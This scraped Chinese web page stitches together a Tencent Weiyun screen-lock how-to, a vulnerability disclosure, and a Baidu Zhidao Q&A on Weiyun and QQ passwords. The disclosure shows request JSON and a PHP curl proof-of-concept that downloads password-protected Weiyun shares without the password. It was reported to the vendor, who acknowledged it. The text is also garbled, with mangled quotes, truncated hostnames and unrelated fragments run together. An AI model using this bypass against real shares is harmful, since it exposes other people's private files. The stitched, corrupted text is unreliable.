腾讯微云怎么设置密码的号和密码

来源:蜘蛛抓取(WebSpider) 时间:2015-06-06 01:59 标签: 腾讯微云和360云盘
手机腾讯微云在哪里设置屏幕锁?
手机腾讯微云在哪里设置屏幕锁?我们在手机上安装了腾讯微云以后,我们在微云相册中上传了很多自己的相片和视频,当别人用我们的手机的时候,别人可能会无意的打开我们的相册查看,下面分享设置屏幕锁的方法
我们在手机上安装了腾讯微云以后,我们在微云相册中上传了很多自己的相片和视频,当别人用我们的手机的时候,别人可能会无意的打开我们的相册查看,那么怎么设置腾讯微云的屏幕锁呢?只有输入正确的密码以后才可以打开我们的微云相册查看!小编这里介绍一下方法!
软件名称:腾讯微云网盘工具 for windows客户端 2.2.0.1154 中文官方免费安装版软件大小:19.7MB更新时间:
1、打开手机安装的腾讯微云客户端!
2、这时候点击工具打开!
3、点击工具中的设置按钮!
4、设置中点击安全与隐私!
5、安全与隐私中点击屏幕锁打开进行设置!
6、设置屏幕锁中我们输入两次密码!
7、设置好屏幕锁以后,打开腾讯微云的时候需要先输入密码才可以进入!
相关推荐:分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
闲的无聊看微云分享下载的时候意外发现密码可绕过
详细说明:
首先分享一个文件 获得链接 /VNW1B5 访问时直接跳到 /26ef1d114796fde0b5a32a9c1f90179f
在获取文件列表时 提交了密码
{&req_header&:{&cmd&:12002,&appid&:30111,&version&:2,&major_version&:2},&req_body&:{&ReqMsg_body&:{&weiyun.WeiyunShareViewMsgReq_body&:{&os_info&:&windows&,&browser&:&chrome&,&share_key&:&26ef1d114796fde0b5a32a9c1f90179f&,&share_pwd&:&uF06&}}}}
但无Cookie存入 然后点击下载
{&req_header&:{&cmd&:12003,&appid&:30111,&version&:2,&major_version&:2},&req_body&:{&ReqMsg_body&:{&weiyun.WeiyunShareDownloadMsgReq_body&:{&share_key&:&26ef1d114796fde0b5a32a9c1f90179f&,&pack_name&:&pack.txt&}}}}
发现竟然没有发送密码 刚才也没有Cookie存入
然后嘛 测试了一下 pack_name是否可以任意
竟然的确可以 也就是说 除了下载是什么名称不知道 内容完全可以直接下载
简单写了个php做测试 程序中用 $_GET['url'] 传入分享的url(由于获取不了名称 直接把&pack_name&改为Unknow)
code 区域&?php
$a=str_replace(array('http://','/',&#/'),'',$_GET['url']);
if(strlen($a)&=10){
$ch=curl_init('/'.$a);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$b=curl_exec($ch);
curl_close($ch);
preg_match('/^Location: (.*?)\r\n/m',$b,$m);
$a=substr($m[1],24);
$ch=curl_init('http://web2./outlink.fcg?cmd=12003&g_tk=&data=%7B%22req_header%22%3A%7B%22cmd%22%3Aappid%22%3Aversion%22%3A2%2C%22major_version%22%3A2%7D%2C%22req_body%22%3A%7B%22ReqMsg_body%22%3A%7B%22weiyun.WeiyunShareDownloadMsgReq_body%22%3A%7B%22share_key%22%3A%22'.$a.'%22%2C%22pack_name%22%3A%22Unknow%22%7D%7D%7D%7D');
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$b=curl_exec($ch);
curl_close($ch);
preg_match('/&download_url&: &(.*?)&/m',$b,$m);
header('Location: '.$m[1]);
然后 内容一览无余...
漏洞证明:
先上传一个文件 内容乱打的不要在意
然后就分享文件
用上文中的php程序无密码直接下载
下载后内容一致
修复方案:
在下载时同样要提交密码 等等
版权声明:转载请注明来源 @
厂商回应:
危害等级:低
漏洞Rank:5
确认时间: 18:49
厂商回复:
非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
我靠再也不用微云了
登录后才能发表评论,请先腾讯微云和QQ邮箱的密码是不是就是QQ的密码?_百度知道
腾讯微云和QQ邮箱的密码是不是就是QQ的密码?
提问者采纳
(ㄒoㄒ)简直感动到哭,被采纳了!!
提问者评价
太给力了,你的回答完美地解决了我的问题,非常感谢!
其他类似问题
为您推荐:
qq邮箱的相关知识
其他5条回答
空间,等等的密码都是QQ登陆密码望采纳是的,QQ邮箱
肯定是一致的!
都一样的!
已通知提问者对您的回答进行评价,请稍等
如果没有设置过二次登录密码的话就是,
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁

我要回帖

更多关于 腾讯微云和360云盘 的文章

 

随机推荐